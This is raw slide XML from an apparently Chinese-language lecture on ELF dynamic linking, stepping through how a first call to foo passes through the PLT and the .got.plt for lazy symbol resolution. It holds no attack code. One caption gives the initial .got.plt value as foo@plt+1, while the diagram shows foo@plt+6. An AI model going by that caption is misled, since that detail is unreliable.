            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="875" name="Shape 875"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="876" name="Shape 876"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="877" name="Shape 877"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="878" name="Shape 878"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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push *(GOT+4)</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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="879" name="Shape 879"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="880" name="Shape 880"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="881" name="Shape 881"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="882" name="Shape 882"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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883" name="Shape 883"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="884" name="Shape 884"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="885" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA794344-267D-4FE0-8DF1-A45841250A12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633313" y="4865168"/>
            <a:ext cx="4993675" cy="646331"/>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跳转到 </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plt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中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表项</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plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 中的代码立即跳转到 </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got.plt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中记录的地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78DB2A8-5EDD-46D0-94BA-4BF4BE48C016}"/>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动态链接过程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2" name="Shape 892"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893" name="Shape 893"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="894" name="Shape 894"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="895" name="Shape 895"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="896" name="Shape 896"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897" name="Shape 897"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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push *(GOT+4)</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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898" name="Shape 898"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="899" name="Shape 899"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Shape 900"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="901" name="Shape 901"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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902" name="Shape 902"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="903" name="Shape 903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="904" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1790191-4AB8-4659-9DB0-E65588BCFEEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5749224" y="4865168"/>
            <a:ext cx="4241867" cy="646331"/>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由于进程是第一次调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>故 </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got.plt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中记录的地址是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo@plt+1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AB2D06-2237-4AB7-8E49-2509A066979F}"/>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动态链接过程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911" name="Shape 911"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="912" name="Shape 912"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913" name="Shape 913"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Shape 914"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="915" name="Shape 915"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(foo@GOT)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push index</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="916" name="Shape 916"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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push *(GOT+4)</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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="917" name="Shape 917"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="918" name="Shape 918"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="919" name="Shape 919"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920" name="Shape 920"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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921" name="Shape 921"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="922" name="Shape 922"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="923" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52BC0DDB-ECF4-441A-A8DB-D8BD7B1E0CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="407996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回到 </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plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 是为了解析 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的实际地址</a:t>
            </a:r>
